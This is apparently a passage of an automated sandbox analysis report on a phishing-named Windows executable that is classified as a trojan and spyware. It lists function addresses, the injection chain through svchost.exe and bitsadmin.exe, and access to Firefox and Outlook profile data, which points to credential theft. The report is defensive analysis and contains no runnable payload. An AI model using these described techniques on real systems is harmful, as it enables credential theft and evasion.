                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_005C51BD
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0058D9750_2_0058D975
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0056FCE00_2_0056FCE0
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005821C50_2_005821C5
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005962D20_2_005962D2
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005E03DA0_2_005E03DA
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0059242E0_2_0059242E
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005825FA0_2_005825FA
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005BE6160_2_005BE616
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005766E10_2_005766E1
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0056E6A00_2_0056E6A0
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0059878F0_2_0059878F
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005E08570_2_005E0857
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005968440_2_00596844
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005788080_2_00578808
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C88890_2_005C8889
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0058CB210_2_0058CB21
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00596DB60_2_00596DB6
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00576F9E0_2_00576F9E
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005730300_2_00573030
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0058F1D90_2_0058F1D9
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005831870_2_00583187
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005612870_2_00561287
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005814840_2_00581484
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005755200_2_00575520
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005876960_2_00587696
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005757600_2_00575760
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005819780_2_00581978
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00599AB50_2_00599AB5
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005E7DDB0_2_005E7DDB
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00581D900_2_00581D90
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0058BDA60_2_0058BDA6
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0056DF000_2_0056DF00
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00573FE00_2_00573FE0
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_010A59B00_2_010A59B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189932_2_00418993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401ACB2_2_00401ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F0B32_2_0042F0B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032F02_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A902_2_00402A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3D32_2_0040E3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B8E2_2_00416B8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B932_2_00416B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C402_2_00401C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C3A2_2_00401C3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E51C2_2_0040E51C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5232_2_0040E523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E492_2_00402E49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E502_2_00402E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F192_2_00402F19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027202_2_00402720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD22_2_03403FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD52_2_03403FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: String function: 00580AE3 appears 70 times
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: String function: 00567DE1 appears 36 times
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: String function: 00588900 appears 42 times
                Source: Latest advice payment.exe, 00000000.00000003.2141788113.0000000003CBD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Latest advice payment.exe
                Source: Latest advice payment.exe, 00000000.00000003.2141665348.0000000003B13000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Latest advice payment.exe
                Source: Latest advice payment.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@12/9
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CA06A GetLastError,FormatMessageW,0_2_005CA06A
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B81CB AdjustTokenPrivileges,CloseHandle,0_2_005B81CB
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_005B87E1
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_005CB333
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005DEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_005DEE0D
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_005CC397
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00564E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00564E89
                Source: C:\Users\user\Desktop\Latest advice payment.exeFile created: C:\Users\user\AppData\Local\Temp\aut7051.tmpJump to behavior
                Source: Latest advice payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bitsadmin.exe, 00000008.00000003.2622832474.0000000002E64000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2622955906.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2625530122.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3990678417.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3990678417.0000000002EB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Latest advice payment.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\Latest advice payment.exe "C:\Users\user\Desktop\Latest advice payment.exe"
                Source: C:\Users\user\Desktop\Latest advice payment.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Latest advice payment.exe"
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Latest advice payment.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Latest advice payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Latest advice payment.exeStatic file information: File size 1216000 > 1048576
                Source: Latest advice payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Latest advice payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Latest advice payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Latest advice payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Latest advice payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Latest advice payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Latest advice payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CWtKbasqHVKAO.exe, 00000007.00000000.2349023099.000000000065E000.00000002.00000001.01000000.00000005.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000000.2505529018.000000000065E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Latest advice payment.exe, 00000000.00000003.2141005664.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Latest advice payment.exe, 00000000.00000003.2141665348.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318563646.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2315519432.0000000003000000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2434183200.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.000000000325E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2437972355.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Latest advice payment.exe, 00000000.00000003.2141005664.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Latest advice payment.exe, 00000000.00000003.2141665348.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2435654501.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318563646.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2435654501.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2315519432.0000000003000000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2434183200.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3991458176.000000000325E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000008.00000003.2437972355.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Latest advice payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Latest advice payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Latest advice payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Latest advice payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Latest advice payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00564B37 LoadLibraryA,GetProcAddress,0_2_00564B37
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0056C4C6 push A30056BAh; retn 0056h0_2_0056C50D
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00588945 push ecx; ret 0_2_00588958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402055 push edx; iretd 2_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004018A1 push edx; iretd 2_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414930 push eax; retf 2_2_00414937
